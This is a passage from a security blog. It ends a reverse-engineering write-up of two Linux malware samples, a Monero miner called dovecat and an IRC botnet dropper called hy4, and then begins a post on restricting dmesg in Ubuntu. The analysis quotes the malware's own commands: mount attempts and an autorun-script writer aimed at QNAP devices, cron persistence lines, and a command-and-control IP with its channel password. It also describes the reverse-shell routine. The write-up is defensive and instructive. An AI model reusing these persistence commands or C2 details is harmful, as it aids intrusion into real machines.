At the time of writing, they have pocketed 1.861194 XMR for their efforts,
which is about $248 USD or $371 NZD or $210 Euro.</p>
<p><img src="/assets/images/2020_030.png" alt="Hashrate" /></p>
<p>The hashrate seems to be going upward, but it goes up and down, probably as
machines are infected, start mining, get discovered by their owners, and then
offlined.</p>
<p><img src="/assets/images/2020_031.png" alt="Workers" /></p>
<p>There seems to be 3 “workers”, although, I think multiple machines are identifying
themselves as a single “worker”. The configuration string we saw had <code class="language-plaintext highlighter-rouge">"rig-id": "w1"</code>
set, which means the system was probably in the <code class="language-plaintext highlighter-rouge">w1</code> worker.</p>
<p>Alright, we have now established that this malware is likely a Monero (XMR)
cryptocurrency miner. Now we need to try and see if this program is hiding any
other secrets, or if it is just an off the shelf miner.</p>
<p>Back to string searching in the binary, it seems we have found a man page, or
the documentation for the program:</p>
<p><img src="/assets/images/2020_032.png" alt="man page" /></p>
<p><img src="/assets/images/2020_033.png" alt="more strings" /></p>
<p>These strings indicate that this is a copy of <code class="language-plaintext highlighter-rouge">XMRig 6.3.3</code>, which is free and
open source Monero mining software. It’s upstream code repository is:</p>
<p><a href="https://github.com/xmrig/xmrig">https://github.com/xmrig/xmrig</a></p>
<p>Having a further look at the binary, it is looking like the attacker just
cloned the repo, hard coded their configuration in, and statically compiled
a binary, and named it <code class="language-plaintext highlighter-rouge">dovecat</code> to try make it blend into a system, so
people would think its just <code class="language-plaintext highlighter-rouge">dovecot</code>, which is a mail daemon.</p>
<p>I don’t think we need to look at any more assembly for this executable, the
executable is too large, and it is very likely going to be benign. We can
always catch bad behaviour during dynamic analysis.</p>
<h2 id="bash7--init7--sh7-aka-hy4">bash7 / init7 / sh7 aka hy4</h2>
<p>Time to dive into the next malware sample, bash7 / init7 / sh7. This one is
small enough that we should be able to cover most of its functions.</p>
<p>Now, what I find striking about this sample, is that it isn’t stripped.
This sample has its debug symbols intact. Why? Did the attacker forget to strip
the binary before pushing it to the world? Or is it intentional? Who knows.</p>
<p>But we are exceptionally lucky. Now we can get some serious insight into this
binary.</p>
<p>Ghidra shows us a list of files which this executable was compiled from. There
are 190 different files in total, a few of them are below:</p>
<p><img src="/assets/images/2020_035.png" alt="files" />
<a href="/assets/bin/hy4_filelist.txt">Click for full list of files</a></p>
<p>The only one that stood out was “hy4.c”. It doesn’t seem to be a part of any
standard library, and searches return no results. I suppose we will call this
malware <strong>hy4</strong> from now on.</p>
<p>Since we can see a list of all functions this malware calls, it shouldn’t be too
hard determining what it does.</p>
<p><img src="/assets/images/2020_036.png" alt="functions" />
<a href="/assets/bin/hy4_functions.txt">Click for full list of functions</a></p>
<p>Lets jump to <code class="language-plaintext highlighter-rouge">main()</code> and have a look:</p>
<p>The control flow graph itself isn’t too bad. We seem to have a large initialisation
stage, followed by some blocks at the bottom which seem to be infinite loops
that are swapped between.</p>
<p><img src="/assets/images/2020_037.png" alt="control flow graph" /></p>
<p>The first thing that hy4 does is call <code class="language-plaintext highlighter-rouge">rand_init()</code>, <code class="language-plaintext highlighter-rouge">daemonize()</code> and
<code class="language-plaintext highlighter-rouge">bindport()</code>. Let’s see what these do.</p>
<p><img src="/assets/images/2020_038.png" alt="3 functions" /></p>
<p><code class="language-plaintext highlighter-rouge">rand_init()</code> seems to set ‘x’ to the time, ‘y’ seems to be the xor of process
id and parent process id, and z seems to be the clock. w seems to be the xor
of clock and time.</p>
<p><img src="/assets/images/2020_039.png" alt="rand" /></p>
<p><code class="language-plaintext highlighter-rouge">daemonize()</code> seems to see if the process is a child, and if it isn’t, then
it forks. It checks to see if <code class="language-plaintext highlighter-rouge">fork()</code> fails, and if it does then it exits, and
the parent also exits. Only the child remains running.</p>
<p><img src="/assets/images/2020_040.png" alt="daemonize" /></p>
<p>It then redirects the programs file descriptiors for stdin and stdout to
<code class="language-plaintext highlighter-rouge">/dev/null</code>, and changes the signal handler for the following signals:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x11 - SIGCHLD
0x14 - SIGSTP
0x16 - SIGTTOU
0x15 - SIGTTIN
1 - SIGHUP
0xf - SIGTERM
</code></pre></div></div>
<p>The new signal handler is 0x1, or True. Looking at the signals changed, it seems
the attacker really doesn’t want this malware to be killed or interrupted.</p>
<p><code class="language-plaintext highlighter-rouge">bindport()</code> seems to create a socket, and bind it. To see what port,
we bind <code class="language-plaintext highlighter-rouge">&local_18</code> of type <code class="language-plaintext highlighter-rouge">sockaddr</code>. The compiler has done some stuff, so:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct sockaddr {
sa_family_t sa_family;
char sa_data[14];
}
</code></pre></div></div>
<p><img src="/assets/images/2020_041.png" alt="bindport" /></p>
<p><code class="language-plaintext highlighter-rouge">sa_family</code> is <code class="language-plaintext highlighter-rouge">2</code> as per <code class="language-plaintext highlighter-rouge">&local_18</code>. <code class="language-plaintext highlighter-rouge">sa_data</code> is derived from <code class="language-plaintext highlighter-rouge">local_14</code> and
<code class="language-plaintext highlighter-rouge">local_16</code>.</p>
<p>We then start listening on the port.</p>
<p>What happens next is kinda weird. hy4 checks to see if <code class="language-plaintext highlighter-rouge">/share/CACHEDEV1_DATA/Web</code>
exists. If it does, we enter the if statement:</p>
<p><img src="/assets/images/2020_042.png" alt="CACHEDEV" /></p>
<p>It then executes some shell commands using <code class="language-plaintext highlighter-rouge">system()</code>. The first tries to mount
a bunch of devices in a brute force fashion to <code class="language-plaintext highlighter-rouge">/tmp/config</code>. with the below
command:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mount $(/sbin/hal_app --get_boot_pd port_id=0)6 /tmp/config ;
mount -t ext2 /dev/mtdblock4 /tmp/config ;
mount -t ext2 /dev/mtdblock5 /tmp/config ;
mount -t ext2 /dev/sdx6 /tmp/config ;
mount -t ext2 /dev/sdc6 /tmp/config"
</code></pre></div></div>
<p>If any of these succeed, then it runs a command to make a autorun file that is
a shell script:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>echo \"#!/bin/sh\n%s\" > /tmp/config/autorun.sh ;
chmod +x /tmp/config/autorun.sh
</code></pre></div></div>
<p>Script seems empty for now. What is this <code class="language-plaintext highlighter-rouge">/share/CACHEDEV1_DATA/Web</code> directory?
Is it from some sort of vulnerable internet of things device? I googled it and
it seems to be for QNAP devices. QNAP seems to manufacture NAS, video cameras
and stuff. Typical internet of things device.</p>
<p>Moving on.</p>
<p>The code then attempts to access a bunch of directories to see if they are
writable.</p>
<p><img src="/assets/images/2020_043.png" alt="writable" /></p>
<p>These directories look familiar…</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/dev/shm/
/var/tmp/
/tmp/
/var/lock/
/var/run/
</code></pre></div></div>
<p>If they are writable, they get added to some sort of list. It then goes and
opens a few crontabs, and does some greps.</p>
<p><img src="/assets/images/2020_044.png" alt="crontab" /></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"(crontab -l | grep -v \"/%s\" | grep -v \"/sh7\" | grep -v \"/init7\" | grep -v \"/bash7\" | grep -v \"no cron\" > %s) > /dev/null 2>&1"
</code></pre></div></div>
<p>Hmm. Is it checking to see if the crontab is already infected? I think it is.</p>
<p>If the system is not already infected, it calls <code class="language-plaintext highlighter-rouge">injectbot()</code> on the following
directories:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$PWD
/dev/shm/
/var/tmp/
/tmp/
/var/lock/
/var/run/
</code></pre></div></div>
<p>Lets look at <code class="language-plaintext highlighter-rouge">injectbot()</code>:</p>
<p><img src="/assets/images/2020_045.png" alt="injectbot" /></p>
<p>It seems to have “init7”, “bash7” and “sh7” hard-coded, and selects them randomly
depending on the <code class="language-plaintext highlighter-rouge">gettimeofday()</code> and a random chance. From there <code class="language-plaintext highlighter-rouge">malloc()</code> a
buffer, where we make a copy of the running executable, and copy it to the
new path with the newly randomly chosen name.</p>
<p>Since this happens a bunch of times, we end up with all the duplicate copies.</p>
<p>Once these have been run, a new cronjob is installed in the system, in this
case at <code class="language-plaintext highlighter-rouge">/var/spool/cron/crontabs/daemon</code>.</p>
<p>If we look at the sosreport from the infected system, we see:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/var/lock/.hh21804289383 installed on Thu Oct 22 12:54:01 2020)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
*/10 * * * * /var/tmp/bash7 > /dev/null 2>&1 &
*/2 * * * * /var/lock/init7 > /dev/null 2>&1 &
*/1 * * * * /dev/shm/sh7 > /dev/null 2>&1 &
*/10 * * * * /tmp/init7 > /dev/null 2>&1 &
</code></pre></div></div>
<p>We now fully understand how this malware gains persistence (cronjobs and redundant
binaries), and prevents itself from being terminated (forking to daemon, re-registering
signal handlers).</p>
<p>Now things start getting more interesting. We have reached the end of the large
initialisation section, and have now entered the loops, of what seems to be
IRC server communication.</p>
<p><img src="/assets/images/2020_046.png" alt="IRC" /></p>
<p>We make some random numbers, call <code class="language-plaintext highlighter-rouge">makestring()</code>, which in term, makes a string
out the hostname or uname with some random characters added to the end:</p>
<p><img src="/assets/images/2020_047.png" alt="uname" /></p>
<p>From there, the result of <code class="language-plaintext highlighter-rouge">makestring()</code> becomes the systems IRC nick.
It connects to channel <code class="language-plaintext highlighter-rouge">#XLM</code> with pass <code class="language-plaintext highlighter-rouge">321</code>:</p>
<p><img src="/assets/images/2020_048.png" alt="channel" /></p>
<p><img src="/assets/images/2020_049.png" alt="password" /></p>
<p>After that, hy4 calls <code class="language-plaintext highlighter-rouge">con()</code>, which seems to have functionality to swap
between different IRC servers. What it seems to do on the first try is to
connect to <code class="language-plaintext highlighter-rouge">5.253.84.148</code>, uses the nick, channel and pass from before,
and sends the string <code class="language-plaintext highlighter-rouge">"NICK %s\nUSER K localhost localhost :2010\n"</code>.</p>
<p><img src="/assets/images/2020_050.png" alt="con" /></p>
<p>After that, two main things happen:</p>
<p>The first, is that hy4 <code class="language-plaintext highlighter-rouge">recv()</code> some data, and then calls <code class="language-plaintext highlighter-rouge">strtok()</code> to parse
it:</p>
<p><img src="/assets/images/2020_051.png" alt="recv" /></p>
<p>There isn’t any indication of what the commands we are parsing are though.</p>
<p><img src="/assets/images/2020_052.png" alt="parse" /></p>
<p>We stay in this loop forever though, so hy4 always waits for instructions, than
goes to execute them.</p>
<p><img src="/assets/images/2020_053.png" alt="call ecx" /></p>
<p>See that <code class="language-plaintext highlighter-rouge">call ecx</code> on the far right? It seems we load the address of a function
to <code class="language-plaintext highlighter-rouge">ecx</code> and execute it. I’m not sure what function though.</p>
<p>Let’s have a look for other functions to see what functionality the IRC
commands might call.</p>
<p><img src="/assets/images/2020_054.png" alt="functions" /></p>
<p><code class="language-plaintext highlighter-rouge">376()</code> seems to be how hy4 joins a IRC server, and is pretty explicit:</p>
<p><img src="/assets/images/2020_055.png" alt="376" /></p>
<p><code class="language-plaintext highlighter-rouge">433()</code> seems to rotate the IRC nick.</p>
<p><img src="/assets/images/2020_056.png" alt="433" /></p>
<p><code class="language-plaintext highlighter-rouge">_NICK()</code> seems to check for a specific IRC nick.</p>
<p><img src="/assets/images/2020_057.png" alt="nick" /></p>
<p><code class="language-plaintext highlighter-rouge">ping()</code> just seems to reply on IRC with “pong”.</p>
<p><img src="/assets/images/2020_058.png" alt="ping" /></p>
<p><code class="language-plaintext highlighter-rouge">cback()</code> turned out to be extremely interesting. It appears to fork off a new
process, which makes a socket, and connects to a remote host on a specific
port and IP.</p>
<p><img src="/assets/images/2020_059.png" alt="cback" /></p>
<p>This is your classic reverse shell. It takes two parameters, “IP” and “PORT”
and if you pass any more, you get a IRC message error with
<code class="language-plaintext highlighter-rouge">"NOTICE %s :CBACK <ip> <port>\n"</code>.</p>
<p>When you connect to the reverse shell, you see the strings:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"NOTICE %s :Connected.\n"
"echo [-] logged at `date`"
"echo [-] `uname -a || cat /proc/version`"
</code></pre></div></div>
<p>If you are lucky enough, it will even check for gid 0, and print “root shell!”
if you happen to be root:</p>
<p><img src="/assets/images/2020_060.png" alt="root shell" /></p>
<p>It then <code class="language-plaintext highlighter-rouge">execve("/bin/sh")</code>, and a shell is spawned for the remote attacker.
stdin and stdout are redirected to the socket, via the calls to dup2.</p>
<p><img src="/assets/images/2020_061.png" alt="dup2" /></p>
<p>There seems to be some steps taken to prevent any commands from this shell
from being logged. It also exports a normal <code class="language-plaintext highlighter-rouge">$PATH</code>.</p>
<p><img src="/assets/images/2020_065.png" alt="history" /></p>
<p>I went and tracked down all the strings from the hy4 section, and found:</p>
<p><img src="/assets/images/2020_062.png" alt="strings" /></p>
<p>It seems the commands are just: <code class="language-plaintext highlighter-rouge">CBACK</code>, <code class="language-plaintext highlighter-rouge">IRC</code>, <code class="language-plaintext highlighter-rouge">NOTICE</code>, <code class="language-plaintext highlighter-rouge">MODE</code>, <code class="language-plaintext highlighter-rouge">JOIN</code>, <code class="language-plaintext highlighter-rouge">PONG</code>
<code class="language-plaintext highlighter-rouge">PRIVMSG</code>, <code class="language-plaintext highlighter-rouge">PING</code>, <code class="language-plaintext highlighter-rouge">NICK</code>.</p>
<p>I wonder what this string is:</p>
<p><img src="/assets/images/2020_063.png" alt="jp string" /></p>
<p><img src="/assets/images/2020_064.png" alt="translate" /></p>
<p>Playful thoughts indeed.</p>
<p>I think that about wraps up the analysis of <strong>hy4</strong>. What I didn’t come across
was a way for a file to be downloaded and executed automatically, but the
functionality could very well be there, and I just didn’t look hard enough.</p>
<h1 id="executive-summary-of-malware-infection">Executive Summary of Malware Infection</h1>
<h2 id="infection-vector">Infection Vector</h2>
<p>For this particular system, the initial infection vector is unknown.</p>
<p>My only remarks are:</p>
<ol>
<li>The system was out of date, and had not been patched at all in at least 18 months.</li>
<li>The system was running as a desktop computer, virtualised in the cloud.</li>
</ol>
<p>Firefox was very old, at version 68. If you run old outdated browsers, along with
being out of date on other software, such as the kernel and such, you open yourself
up to drive by downloads and arbitrary execution vulnerabilities.</p>
<p>Desktop tasks are exposed to more risks than running a standard production
workload, due to web browsing and constantly executing untrusted code in the
form of Javascript. It is important to keep these systems up to date, and not
forget about these when the are hidden away as virtualised appliances.</p>
<p>I do not believe that this malware was targeted. Quite the opposite, it seems
that this malware was just opportunistic, in the right place at the right time,
and was only motivated by the attacker making a quick buck.</p>
<p>hy4 was likely first onto the system, and was likely instructed to download and
execute dovecat as a malware dropper payload.</p>
<h2 id="dovecat-2">dovecat</h2>
<p>dovecat is cryptocurrency miner built from a freely accessible program called
XMRig, at version 6.3.3. It uses CPU and memory resources to process currency
transactions for the Monero (XMR) cryptocurrency.</p>
<p>The executable itself is not dangerous. It does not steal data. All it does is
consume computing resources for financial gain in the form of Monero.</p>
<p>dovecat can be removed by terminating the process and deleting the executable.</p>
<h2 id="hy4">hy4</h2>
<p>hy4 is dangerous and should be considered as a threat. Due to hy4 connecting to
and forming a part of a IRC botnet, and accepting commands remotely, any system
found to be infected with hy4 should be considered compromised, and should be
removed from production immediately.</p>
<p>Since an attacker has the ability to spawn a root shell, and interact with it
remotely, an attacker can explore the compromised system, and can steal data
with ease. All credentials on this machine should be revoked, and assume an
attacker has constant remote access to the compromised machine.</p>
<p>Since hy4 gains deep persistence and is difficult to terminate, I recommend that
the system is to be decommissioned and erased, and installed fresh in order to
remove the infection.</p>
<h2 id="recommendations">Recommendations</h2>
<p>I always recommend you keep your system up to date. If possible, patch daily
or at least weekly, and it helps if you are running the latest Ubuntu LTS.</p>
<p>If you have a number of machines, you can install a program called
<code class="language-plaintext highlighter-rouge">unattended-upgrades</code> with <code class="language-plaintext highlighter-rouge">$ sudo apt install unattended-upgrades</code>. It will
patch the machine on a regular schedule.</p>
<p>If you have a large fleet of machines, then maybe a service like
<a href="https://landscape.canonical.com/">Landscape</a> can be useful. It lets you view
your fleet’s update status on a nice web interface, and you can patch your
fleet with a few clicks in your web browser.</p>
<p>As always, only trust software from the official Ubuntu software archives. When
you download and install software from a website to your machine, you are taking
a risk that the software is not malicious.</p>
<h1 id="my-thoughts-on-the-malware-and-attribution">My Thoughts on the Malware and Attribution</h1>
<p>I have reverse engineered a fair amount of malware in my time, but this was the
first Linux malware I have ever looked into. On the whole it was actually pretty
pleasant, due to Cutter and Ghidra being very mature tools. The only thing
missing is a good debugger, and I miss not being able to use x64dbg, since its
Windows only.</p>
<p>The malware itself was pretty interesting. hy4 is one interesting specimen.
dovecat not so much, since it is a rebuilt open source miner, just hard coded
to mine Monero for the attacker.</p>
<p>hy4 is strange at a first glance. Not stripping debugging symbols was a huge
mistake on the attacker’s part. It meant that I could read function names in
the code just as they were in the source code, and the symbols also helped
Ghidra’s decompiler build an accurate source code picture.</p>
<p>hy4 itself is also remarkably simple. It gains persistence, and joins an IRC
botnet and awaits external instructions. Its functionality allows to spawn a
reverse shell back to the attacker, and very likely carries functionality to
download and execute malware.</p>
<p>It seems very basic. Someone has obviously written this as their first foray
into cybercrime. The techniques used to gain persistence and prevent being
terminated are entry level, but its complex as it talks to a remote C2 server.</p>
<p>This is no teenage script kiddy. This is a semi-experienced to experienced
software engineer who is likely very new to writing malware, and this is
probably their first botnet.</p>
<p>The malware was written by hand, and the botnet is probably owned by the author
of the malware. The author is probably early in their career, recently finishing
University with some sort of Computer Science degree, and has taken some
operating system classes to learn about <code class="language-plaintext highlighter-rouge">fork()</code>, <code class="language-plaintext highlighter-rouge">dup2()</code> and signals.</p>
<p>Most script kiddys could buy a quality exploit kit + botnet off of the dark net
for a few hundred dollars, and it would be fully featured and be much more
complex than hy4 is.</p>
<p>hy4 seems to be full of beginner mistakes, for example, not stripping the
binary, using a default UPX and not modifying the UPX distribution such that
normal UPX won’t be able to unpack the executable. All the strings in the
binary were not encrypted, or any effort undertaken to hide them. There was
no inserting of data bytes in code to fool disassembly algorithms.</p>
<p>There was no hiding domain names or IP addresses.</p>
<p>hy4 and dovecat seem to be compiled very recently, within the last month.
dovecat also had metadata intact, and we could see what compiler was used.
Possibly written by someone bored at home during COVID lockdowns? Who knows.</p>
<p>To the owner of hy4. Take your botnet down. If someone was sufficiently
motivated, they could probably find you. You have likely made similar beginner
mistakes with your IRC C2 server. The risk is not worth it for $200 of Monero.</p>
<p>I’m not going to come after you. I don’t care in the slightest. I only did this
analysis for fun, and to see what sort of threat this malware has to the
community.</p>
<p>But hey, your malware is also great analysis for beginner malware analysts. If
anyone reading this is a beginner reverse engineer, give these samples a try.
You won’t be disappointed.</p>
<h1 id="conclusion">Conclusion</h1>
<p>Today, we did a full analysis of the dovecat and hy4 malware, from samples taken
from a real production machine that had been infected, from a case filed about
some suspicious behaviour.</p>
<p>We determined that dovecat is a cryptocurrency miner that mines Monero (XMR),
and hy4 is a IRC botnet malware dropper, that has the ability to spawn root
shells, and to execute malware payloads.</p>
<p>I had a lot of fun analysing this malware. It’s great to get back to reverse
engineering again. I don’t get a lot of opportunities to open up Cutter and
Ghidra these days. I like pulling things apart and admiring other’s hard work,
and solving puzzles that reverse engineering binaries bring.</p>
<p>I hope you enjoyed the writeup. If you have any questions or comments,
<a href="/about">contact</a> me.</p>
<p>Matthew Ruffell</p>Matthew RuffellA few days ago, a case came in which had some rather odd symptoms, such as processes using high amounts of CPU and memory, and running from the /tmp directory. After asking for some logs, and some samples of the binaries, it became obvious that the system was compromised, and was now running some interesting malware. In this post, we are going to look into the malware called dovecat, which turned out to be a cryptominer, and hy4, which is a IRC botnet malware dropper. I’m pretty excited, as I haven’t analysed any Linux malware before, and this is real life stuff pulled directly from a production machine, so it still has its fangs intact. Let’s get started.Getting DMESG_RESTRICT Enabled in Ubuntu 20.10 Groovy Gorilla2020-10-24T00:00:00+00:002020-10-24T00:00:00+00:00https://ruffell.nz/programming/writeups/2020/10/24/getting-dmesg-restrict-enabled-in-ubuntu-groovy<p>You might have noticed a small change when running the <code class="language-plaintext highlighter-rouge">dmesg</code> command in
Ubuntu 20.10 Groovy Gorilla, since it now errors out with:</p>
<p><code class="language-plaintext highlighter-rouge">dmesg: read kernel buffer failed: Operation not permitted</code></p>
<p>Don’t worry, it still works, it has just become a privileged operation, and it
works fine with <code class="language-plaintext highlighter-rouge">sudo dmesg</code>. But why the change?</p>
<p>Well, I happen to be the one who proposed for this change to be made, and
followed up on getting the configuration changes made. This blog post will
describe how it slightly improves the security of Ubuntu, and the journey to
getting the changes landed in a release.</p>
<p><img src="/assets/images/2020_020.png" alt="hero" /></p>
<p>So stay tuned, and let’s dive into <code class="language-plaintext highlighter-rouge">dmesg</code>.</p>
<!--more-->
<h1 id="what-is-dmesg">What is dmesg?</h1>
<p><code class="language-plaintext highlighter-rouge">dmesg</code> is a command that allows you to view the kernel log buffer. The kernel
log buffer contains a whole wealth of information about system hardware, devices
attached and their allocated memory regions, and error logging for the system.</p>
<p>This log buffer usually lives at <code class="language-plaintext highlighter-rouge">/dev/kmsg</code> or <code class="language-plaintext highlighter-rouge">/proc/kmsg</code>, which is what
tools like <code class="language-plaintext highlighter-rouge">dmesg</code> or <code class="language-plaintext highlighter-rouge">journalctl</code> or various <code class="language-plaintext highlighter-rouge">syslog</code> programs read from.</p>
<p>If we look at some typical start-up information, it really isn’t too interesting.</p>
<p><img src="/assets/images/2020_021.png" alt="early dmesg" /></p>
<h1 id="why-is-restricting-dmesg-important">Why is restricting dmesg important?</h1>
<p>The thing is, the kernel log buffer can sometimes contain all sorts of security
critical information, such as pointers to kernel memory. There has been a large
effort in the mainline kernel for a few years now to remove all instances of
<code class="language-plaintext highlighter-rouge">printk("%p")</code>, which leaked raw kernel pointers to the kernel log buffer.</p>
<p>These days, all <code class="language-plaintext highlighter-rouge">%p</code> format strings hash the kernel pointer, so the address
itself is not leaked, but still gives a unique identifier for developers to
look at when doing <code class="language-plaintext highlighter-rouge">printk</code>.</p>
<p>However, kernel pointers can still be leaked in other ways, such as if the system
suffers an oops, it will print the current kernel stacktrace, as well as provide
a copy of register values:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> [3191370.893495] WARNING: CPU: 13 PID: 48929 at /build/linux-hwe-FEhT7y/linux-hwe-4.15.0/include/linux/mm.h:852 follow_page_pte+0x6f4/0x710
[3191370.893552] CPU: 13 PID: 48929 Comm: CPU 0/KVM Not tainted 4.15.0-106-generic #107~16.04.1-Ubuntu
[3191370.893552] Hardware name: Dell Inc. PowerEdge R740xd/00WGD1, BIOS 2.6.4 04/09/2020
[3191370.893554] RIP: 0010:follow_page_pte+0x6f4/0x710
[3191370.893555] RSP: 0018:ffffad279f7ab908 EFLAGS: 00010286
[3191370.893556] RAX: ffffdc0fa72eba80 RBX: ffffdc0f9b1535b0 RCX: 0000000080000000
[3191370.893556] RDX: 0000000000000000 RSI: 00003ffffffff000 RDI: 800000b9cbaea225
[3191370.893557] RBP: ffffad279f7ab970 R08: 800000b9cbaea225 R09: ffff9359857fd5f0
[3191370.893558] R10: 0000000000000000 R11: 0000000000000000 R12: ffffdc0fa72eba80
[3191370.893558] R13: 0000000000000326 R14: ffff935de09e19e0 R15: ffff9359857fd5f0
[3191370.893559] FS: 00007f68757fa700(0000) GS:ffff93617ef80000(0000) knlGS:ffff964a7fc00000
[3191370.893559] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[3191370.893560] CR2: 00007ff92ca7a000 CR3: 000000b7209d2005 CR4: 00000000007626e0
[3191370.893561] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[3191370.893561] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[3191370.893561] PKRU: 55555554
[3191370.893562] Call Trace:
[3191370.893565] follow_pmd_mask+0x273/0x630
[3191370.893567] ? gup_pgd_range+0x23f/0xde0
[3191370.893568] follow_page_mask+0x178/0x230
[3191370.893569] __get_user_pages+0xb8/0x740
[3191370.893571] get_user_pages+0x42/0x50
[3191370.893604] __gfn_to_pfn_memslot+0x18b/0x3b0 [kvm]
[3191370.893615] ? mmu_set_spte+0x1dd/0x3a0 [kvm]
[3191370.893626] try_async_pf+0x66/0x220 [kvm]
[3191370.893635] tdp_page_fault+0x14b/0x2b0 [kvm]
[3191370.893640] ? vmexit_fill_RSB+0x10/0x40 [kvm_intel]
[3191370.893649] kvm_mmu_page_fault+0x62/0x180 [kvm]
[3191370.893651] handle_ept_violation+0xbc/0x160 [kvm_intel]
[3191370.893654] vmx_handle_exit+0xa5/0x580 [kvm_intel]
[3191370.893664] vcpu_enter_guest+0x414/0x1260 [kvm]
[3191370.893674] kvm_arch_vcpu_ioctl_run+0xd9/0x3d0 [kvm]
[3191370.893683] ? kvm_arch_vcpu_ioctl_run+0xd9/0x3d0 [kvm]
[3191370.893691] kvm_vcpu_ioctl+0x33a/0x610 [kvm]
[3191370.893693] ? audit_filter_rules+0x232/0x1070
[3191370.893696] do_vfs_ioctl+0xa4/0x600
[3191370.893697] ? __audit_syscall_entry+0xac/0x100
[3191370.893699] ? syscall_trace_enter+0x1d6/0x2f0
[3191370.893700] SyS_ioctl+0x79/0x90
[3191370.893701] do_syscall_64+0x73/0x130
[3191370.893704] entry_SYSCALL_64_after_hwframe+0x3d/0xa2
</code></pre></div></div>
<p>If kernel pointers happen to be in the registers at the time of oops, they get
leaked to the kernel log buffer.</p>
<p>Kernel pointers are valuable to attackers and exploit developers, because they
act as <em>information leaks</em>. These information leaks make it much easier to
de-randomise the kernel base address and to defeat KASLR. If an attacker is
trying to launch a privilege escalation attack against a recently compromised
host, they can also use dmesg to get instant feedback on their exploits, as
failures will cause further oops messages or segmentation faults. This makes it
easier for attackers to fix and tune their exploit programs until they work.</p>
<p>Currently, if I create a new, unprivileged user on a Focal system, they cannot
access <code class="language-plaintext highlighter-rouge">/var/log/kern.log</code>, <code class="language-plaintext highlighter-rouge">/var/log/syslog</code> or see system events in <code class="language-plaintext highlighter-rouge">journalctl</code>.
But yet, they are given free reign to the kernel log buffer.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo adduser dave
$ su dave
$ groups
dave
$ cat /var/log/kern.log
cat: /var/log/kern.log: Permission denied
$ cat /var/log/syslog
cat: /var/log/syslog: Permission denied
$ journalctl
Hint: You are currently not seeing messages from other users and the system.
Users in groups 'adm', 'systemd-journal' can see all messages.
Pass -q to turn off this notice.
Jun 16 23:44:59 ubuntu systemd[2328]: Reached target Main User Target.
Jun 16 23:44:59 ubuntu systemd[2328]: Startup finished in 69ms.
$ dmesg
[ 0.000000] Linux version 5.4.0-34-generic (buildd at lcy01-amd64-014)
(gcc version 9.3.0 (Ubuntu 9.3.0-10ubuntu2)) #38-Ubuntu SMP Mon May 25 15:46:55
UTC 2020 (Ubuntu 5.4.0-34.38-generic 5.4.41)
[ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-5.4.0-34-generic
root=UUID=f9f909c3-782a-43c2-a59d-c789656b4188 ro
</code></pre></div></div>
<p>Strange how an unprivileged user can read dmesg just fine, and yet cannot access
any other kernel logs on the system.</p>
<h1 id="the-initial-proposal">The Initial Proposal</h1>
<p>I sent a proposal to <code class="language-plaintext highlighter-rouge">ubuntu-devel</code> in June which outlines the above problems,
to gather some feedback and to see if anyone else thinks that this is a good
idea.</p>
<p><a href="https://lists.ubuntu.com/archives/ubuntu-devel/2020-June/041063.html">Proposal: Enabling DMESG_RESTRICT for Groovy Onward</a></p>
<p><img src="/assets/images/2020_022.png" alt="proposal" /></p>
<p>I suggested that we restrict access to dmesg to users in group ‘adm’ like so:</p>
<ol>
<li><code class="language-plaintext highlighter-rouge">CONFIG_SECURITY_DMESG_RESTRICT=y</code> in the kernel.</li>
<li>Following changes to <code class="language-plaintext highlighter-rouge">/bin/dmesg</code> permissions in package <code class="language-plaintext highlighter-rouge">util-linux</code>
<ul>
<li>Ownership changes to <code class="language-plaintext highlighter-rouge">root:adm</code></li>
<li>Permissions changed to <code class="language-plaintext highlighter-rouge">0750 (-rwxr-x---)</code></li>
<li>Add <code class="language-plaintext highlighter-rouge">cap_syslog</code> capability to binary.</li>
</ul>
</li>
<li>Add a commented out <code class="language-plaintext highlighter-rouge"># kernel.dmesg_restrict = 0</code> to
<code class="language-plaintext highlighter-rouge">/etc/sysctl.d/10-kernel-hardening.conf</code></li>
</ol>
<p>Let’s break these down.</p>
<p>Number 1 is how <code class="language-plaintext highlighter-rouge">DMESG_RESTRICT</code> gets enforced, as setting <code class="language-plaintext highlighter-rouge">CONFIG_SECURITY_DMESG_RESTRICT=y</code>
in the kernel config restricts the kernel log buffer to executables with
<code class="language-plaintext highlighter-rouge">CAP_SYSLOG</code>, or root privileges.</p>
<p>Number 2 allows users in the <code class="language-plaintext highlighter-rouge">adm</code> group, also known as “administration”, to
be able to execute dmesg without becoming super user, which means nothing
would change for default users in most systems.</p>
<p>Number 3 adds a easy way for system administrators to disable the change if they
want.</p>
<p>I filed a Launchpad bug to document the changes and track the patches I had
created for <code class="language-plaintext highlighter-rouge">util-linux</code> and <code class="language-plaintext highlighter-rouge">procps</code>.</p>
<p><a href="https://bugs.launchpad.net/bugs/1886112">LP #1886112 Enabling DMESG_RESTRICT in Groovy Onward</a></p>
<h2 id="early-responses-and-getting-the-kernel-config-changed-1">Early Responses and Getting the Kernel Config Changed (1)</h2>
<p>The security team were +1 with the change:</p>
<p><a href="https://lists.ubuntu.com/archives/ubuntu-devel/2020-June/041067.html">https://lists.ubuntu.com/archives/ubuntu-devel/2020-June/041067.html</a></p>
<p>When I woke up the next day, the strangest thing happened. <a href="https://www.phoronix.com">Phoronix</a>
had written an article about my proposal!</p>
